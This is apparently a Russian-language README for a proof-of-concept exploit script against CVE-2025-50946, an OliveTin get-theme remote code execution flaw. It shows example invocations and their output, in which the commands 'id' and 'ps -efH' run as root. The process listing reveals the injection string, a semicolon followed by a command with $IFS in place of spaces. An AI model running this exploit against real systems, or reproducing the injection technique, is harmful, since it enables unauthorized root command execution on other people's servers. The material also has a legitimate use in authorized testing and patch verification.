
Эксплойт-скрипт для CVE-2025-50946
Exploit-скрипт для CVE-2025-50946 (OliveTin get-theme RCE). Требования к символам капризны, и многие команды, содержащие несколько аргументов, могут выполняться некорректно. Я не стал тратить время на выяснение первопричины или пытаться сделать скрипт более надёжным. Обращайтесь ко мне или открывайте PR, если вам что-то нужно.
Благодарность chrisWalker11 за оригинальное исследование, на котором я основал этот скрипт: ссылка
Базовый PoC:
python cve-2025-50946.py -t http://192.168.141.194 -p 1337 --command "id"
[*] Target: http://192.168.141.194:1337
[*] Payload: id
[*] Sending payload...
uid=0(root) gid=0(root) groups=0(root)
Список процессов (показан только фрагмент вывода):
python cve-2025-50946.py -t http://192.168.141.194 -p 1337 --command "ps -efH"
[*] Target: http://192.168.141.194:1337
[*] Payload: ps$IFS-efH
[*] Sending payload...
UID PID PPID C STIME TTY TIME CMD
root 2 0 0 09:20 ? 00:00:00 [kthreadd]
root 1 0 0 09:20 ? 00:00:01 /sbin/init
root 313 1 0 09:20 ? 00:00:00 /usr/lib/systemd/systemd-journald
root 738 1 0 09:20 ? 00:00:00 /usr/sbin/cron -f -P
root 749 1 0 09:20 ? 00:00:00 /usr/local/bin/OliveTin
root 2167 749 0 13:26 ? 00:00:00 sh -c olivetin-get-theme http://t;ps$IFS-efH
root 2168 2167 0 13:26 ? 00:00:00 ps -efH